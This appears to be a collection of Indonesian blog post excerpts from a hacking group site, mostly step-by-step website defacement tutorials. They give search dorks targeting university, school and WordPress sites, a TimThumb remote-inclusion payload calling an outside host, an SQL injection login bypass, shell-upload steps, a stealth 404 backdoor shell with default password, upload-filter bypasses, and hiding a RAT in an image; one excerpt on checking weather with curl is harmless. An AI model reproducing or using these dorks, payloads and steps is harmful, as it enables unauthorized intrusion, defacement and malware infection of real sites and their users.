Blood Tears No Team Squad

Yo guys, dah lama gk nulis turtor, Maklum njer liburan :v Kali ini wa mau share metode Bugzilla. Poc gampang nih, Cocok buat yang mau/baru blajar Deface :v Yok dah langsung sadja :v Bahan" : Dork -bugzilla intext:attachment.cgi?id= site: -inurl:attachment.cgi?id= intext:New Account site: -inurl:bugzilla intext:New Account site:com (kembangin lagi njer :v) Step by Step :V 1. Dorking lah di gugel 2. Kalo udah langsung saja klik new account 3. Masukin email kalian 4. Kalo udah, cek email kalian lalu klik tuh yang ane kotakin merah 5. Kalo udah isi data di web tdi. Kalo udah klik File a Bug 6. Terserah mau pilih yang mana, kalo udah klik aja 7. Isi data" nya lalu pilih script kalian lalu klik submit bug 8. Kalo udah klik yang ane tunjukin :v 9. Done kan ea :v Cukup mudah kan :v Sekian dari ane :v Maap kalo salah/kurang jelas :v Thanks :*

squadcyber.org  - Kali ini akan membagikan Shell Backdoor IndoXploit V3 yang di recode oleh P4kl0nc4t dari Obsidian Cyber Team dan menambahkan fitur Stealth . Apa Itu Stealth Version? Jadi Shell Backdoor ini jika di upload ke web akan muncul Not Found (404) seperti default 404 web tersebut, agar di kira orang yang mengakses nya shell yersebut sudah tidak ada. Dan agar kita bisa mengakses shell tersebut, kita cukup menambahkan ?passwd=passwordkalian Contoh : http://villabunga.com/idx.php ?passwd=nganu Dan setelah itu kita dapat mengakses shell tersebut. Download Shell nya di sini Default pass :  p4kl0nc4t Thanks to P4kl0nc4t & IndoXploit

Deface Poc Timthumb Hey yo wats app gengs :v, kali ini w akan memberikan tutorial Deface dengan metode Timthumb. Sebenarnya nih poc dah lama, tapi lumayan lah banyak yang vuln :v wkwkwk  :V . ok langsung saja : Dork : wp-content/plugins/wp-pagenavi/timthumb.php wp-content/plugins/wp-pagenavi/inc/timthumb.php wp-content/plugins/wp-pagenavi/functions/timthumb.php wp-content/plugins/wp-pagenavi/scripts/timthumb.php wp-content/themes/canvas/timthumb.php wp-content/themes/TheStyle/timthumb.php Untuk All dork nya bisa  KLIK DISINI Exploit :   ?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php (btw ini saia pakai cpanel nya Speciment, tq Speciment :*) Ok langsung saja ke tutorial nya 1. Dorking dulu dengan dork diatas.. oce 2. kalo vuln maka akan seperti ini 3. Lalu kasih exploit di belakang url nya site.com/timthumb.php jadi  site.com/timthumb.php ?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php Maka sudah terup...

squadcyber.org - Kembali membawakan tutorial tentang terminal linux atau bisa juga termux, kali ini tidak tentang hacking ataupun defacing, namun hal yang mungkin bermamfaat bagi kalian yang suka berpergian :v. Yaitu cara Menge-cek Ramalan Cuaca di Daerah kalian masing-masing menggunakan terminal linux atau termux. Cara nya cukup mudah, pastikan di linux kalian telah ter-install CURL, dan untuk mengecek nya kalian cukup ketikkan : $ curl http://wttr.in/nama-daerah-kalian Contoh : $ curl http://wttr.in/surabaya Begini hasil nya Demikian postingan kali ini, semoga bermamfaat.

www.squadcyber.org - Yaho guys, kali ini wa mau kasih tutorial depes website Kampus/Universitas pakek metode Bypass Admin :v Meskipun Tutorial lama, Tapi mungkin aja ada yang lom tau jdi apa salahnya share tutorial sederhana ini :v Yok langsung sadja :v Bahan" : Dork : inurl:"?mnux=" intext:siakad inurl:"?mnux=" intext:akademik inurl:"?mnux=" intext:sisfo inurl:"?mnux=" site:id inurl:"?mnux=" site:com inurl:"?mnux=" site:net inurl:/?mnux=login intext:"Powered by Sisfo Kampus" (kembangin lagi guys :v) Exploit : www.site.co.li/ ?mnux=login User & Pass nya : '=''or' Langsung yok :v 1. Dorking pakek dork diatas :v 2. Masukin Exploit nya lalu pilih "Super user" 3. Masukin User & Pass nya : '=''or' lalu klik login 4. Pilih menu Master lalu pilih Mahasiswa 5. Klik edit atau yang ane kasih kotak an merah 6. Pilih Ganti Foto untuk up...

www.squadcyber.org - Yoooo Guys balek lageh ma ane :v Kali ini wa mau kasih tutorial cara pepes dengan metode School Host Up Shell. Yups karna judul nya aja udah ada kata school jadi otomatis target nya adalah web" skolah. Jadi guys, Jangan merusak apapun. Gunakan hanya sebagai pembelajaran saja :v Yok langsung sadja :v Bahan" : Dork : inurl:/?p=guru inurl:/?p=berita inurl:/?p=siswa inurl:/?p=galeri inurl:/?p=bukutamu inurl:"/?p=info" site:id inurl:"/?p=detberita" inurl:"/?p=guru" site:id ( kembangin lagi ya :v) CSRF :  TOUCH ME SENPAI~! Thanks buat bye0nes27 atas CSRF nya  Akses : www.site.co.li/file/materi/shelllu.phtml (ext : phtml) Step by step : 1. Dorking pakek dork diatas :v 2. Kalo sudah ada target, buka CSRF nya lalu masukin url target ke dalam kolom paling atas. Contoh : http://site.co.li/ lalu klik Submit :v 3. Isi username sama password nya terserah ente :v kalo udah klik Insert 4. Langsung pi...

Hai semua. Di tutorial ini akan dibahas cara membypass fungsi pathinfo() dan getimagesize() di PHP yang sering digunakan untuk membatasi upload. Goal tutorial ini yaitu agar file dapat terupload. Berikut pembahasannya. 1. Fungsi getimagesize() Fungsi getimagesize() merupakan salah satu fungsi di PHP yang berfungsi untuk mendapatkan informasi ukuran/dimensi dari sebuah gambar. Fungsi ini sering juga digunakan untuk memvalidasi apakah file yang diupload merupakan gambar atau bukan. Function [ <internal:standard> function getimagesize ] { - Parameters [2] { Parameter #0 [ <required> $imagefile ] Parameter #1 [ <optional> &$info ] } } Return dari fungsi ini berupa array. Berikut contoh return value getimagesize(). root@p4kl0nc4t:~# php -r 'print_r(getimagesize("http://php.net/favicon.ico"));'Array ( [0] => 16 [1] => 16 [2] => 6 [3] => width="16" height="16" [bits] => 24 [mi...

www.squadcyber.org - Jumpa lagi ama ane guys :v Kali ini wa mau kasih tutorial pepes metode Restricted Area. Simak aja yaks :v Dork : inurl:address.php intext:Restricted  inurl:options.php intext:Restricted  inurl:/wp-contacts.php intext:Restricted (kembangin yah biar crutz) Step-step : 1. Dorking pakek dork diatas :v   2. Vuln? tampilannya kek gitu deh :v Langsung sadja lu upload shell U ato script U. Kali ini wa kgk lucky _- jdi nitip aja deh :v Kalo sukses bakal ada tulisan File uploaded successfully! 3. Akses nya? Gampang kok, www.site.co.li/shellU.php Mudah kan? :v Dah ah sekian aja dari ane :v Tungguin next turtor hanya di sene :v Maap kalo ada salah >.< Thanks :*

www.squadcyber.org - Halooo guys, jumpa lagi bersama ane :v Kali ini wa mau kasih tutorial Cara Memasukan RAT Ke dalam Gambar. Dalam dunia komputer, penyisipan atau penyembunyian file ke dalam file lain sering disebut dengan istilah Steganography. Steganografi adalah seni dan ilmu menulis pesan tersembunyi atau menyembunyikan pesan dengan suatu cara sehingga selain si pengirim dan si penerima, tidak ada seorangpun yang mengetahui atau menyadari bahwa ada suatu pesan rahasia (sumber: wikipedia). Dari pada kebanyakan bacot, mending langsung saja :v Siapin bahan" nya : 1. Software nya : http://www.connect-trojan.net/2015/03/bd2.net-injector.html 2. RAT : touch~! (passwordnya 123) 3. Gambar yang mau di isiin RAT (format png atau jpg) 4. Gambar terserah yang penting format nya ico 5. Rokok/kopi/es/sabun serah deh :v Langsung sadja guys :v 1. Extract Software nya lalu Run as Administrator   2. Saya asumsikan kalian sudah mempunyai server dari n...